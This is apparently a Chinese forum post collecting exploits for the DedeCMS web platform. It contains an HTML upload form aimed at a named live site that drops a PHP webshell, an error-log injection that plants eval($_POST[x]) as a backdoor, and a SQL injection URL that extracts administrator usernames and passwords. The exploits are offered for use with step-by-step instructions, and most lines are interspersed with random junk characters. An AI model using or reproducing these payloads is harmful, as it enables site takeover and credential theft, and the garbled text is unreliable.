/ |7 q* n5 G6 y7 c9 A4 s3 |---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br /># a3 {# k# n" }: x% s
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
- ~+ g4 N1 @& U$ l( Y: P& m' p<input type='hidden' name='activepath' value='/data/cache/' />7 ?- C0 Q, A$ G' i4 i& m. E
<input type='hidden' name='cfg_basedir' value='../../' />
& {8 {9 H* O2 Z% \% I6 e; `<input type='hidden' name='cfg_imgtype' value='php' />
1 j, h* i! y& Q: @, N$ w- A$ X, b7 Q<input type='hidden' name='cfg_not_allowall' value='txt' />
4 X4 x8 W: w9 a' m4 ?<input type='hidden' name='cfg_softtype' value='php' />9 P8 `) `: v# Y- X: t0 e2 b- z& N
<input type='hidden' name='cfg_mediatype' value='php' />
* t2 J; N: P, Q4 R+ A% Y- a<input type='hidden' name='f' value='form1.enclosure' />2 W- |/ H U+ \5 ^* j; H
<input type='hidden' name='job' value='upload' />5 w( q9 P6 N* t- \2 F. K0 V
<input type='hidden' name='newname' value='fly.php' />
7 h( Y# N0 f7 K0 d* }Select U Shell <input type='file' name='uploadfile' size='25' />7 @0 [2 V- s+ E! k( r
<input type='submit' name='sb1' value='确定' />5 w7 {+ W& |9 {4 Y% L
</form>
" {+ d4 H. h1 Z4 N; N* M+ ~<br />It's just a exp for the bug of Dedecms V55...<br />
% b' e& y+ C, C; N6 u4 i9 sNeed register_globals = on...<br />$ O- E7 h* e3 z
Fun the game,get a webshell at /data/cache/fly.php...<br />
% v1 J; _1 A$ Y' u% m</body>
1 [9 b2 P% N0 A- x" z$ k</html>
0 G3 Q$ `: \ j, ^9 L( ~4 v% N3 w/ q
6 c' v, c- E+ L% P* c6 d$ R8 J7 ]" f% K
3 I O6 q# ~6 l9 G% t2 \5 C$ {
8 @0 H) d' B m3 j+ e% ~3 L* t' X
/ k* y' \) R3 t& ?
8 c v+ M4 z. h! t
; y8 s" }" ^4 ?9 a) f2 m2 g0 D# L/ g# @0 k R0 c
- f6 ?; w+ L% c% B
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
, ~. e- w) q3 i" O+ I; H0 l利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
' Z! y3 s" }- ]* g4 z @1. 访问网址:! }) c/ ]! F- u2 k _" W
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>; B2 P# K) f" m+ t
可看见错误信息1 r/ @7 G8 J0 y6 J3 U9 W# R- k# \
6 m+ T" v& M% p/ t: h- M* `1 @: h
$ N1 Q4 w3 U+ Q/ [* }% T
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。( Y* e; E7 l8 Z/ ~- _! ]
int(3) Error: Illegal double '1024e1024' value found during parsing
. [: b, U/ y: aError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
# R v1 h+ l; O O2 M: {0 ~5 J v2 u, ~0 [
$ ]8 w6 G k2 v8 y* l. O! y% O3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
, Q# _$ X# N2 h, U
- O3 t* p# V& S- S8 }% K* a: t, e. M5 N* b" @7 l) ~' w
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>' Q1 |7 J I# u) f0 u# c
+ j2 x. k4 {1 G1 I9 ^: P
E0 p" _+ z3 h$ |6 Z8 k按确定后的看到第2步骤的信息表示文件木马上传成功.
; r# Z! C) ~( Q' W6 E# D. j8 r9 B8 j( n, U( E* k' V
- B2 r' _- S& d' E3 O
% w4 r {* F$ ~7 d3 } G0 Z
8 W1 I+ W+ k5 ]1 Z) C% ]
2 a3 b; L- V) n, E: o5 k! y
8 K/ L1 _0 }* m4 z
! K- ]/ o a2 h9 G& z
. W: |# j' Q B2 e9 A7 J+ ]* X( n. }$ v
' z: i, e; d8 p# Z; M( L
4 k# ~) A" `. u$ {6 ?- g' C g* Z9 Z4 t2 ~7 J
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
4 Z2 }1 h; O$ A& C8 u( R4 M' z2 {http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对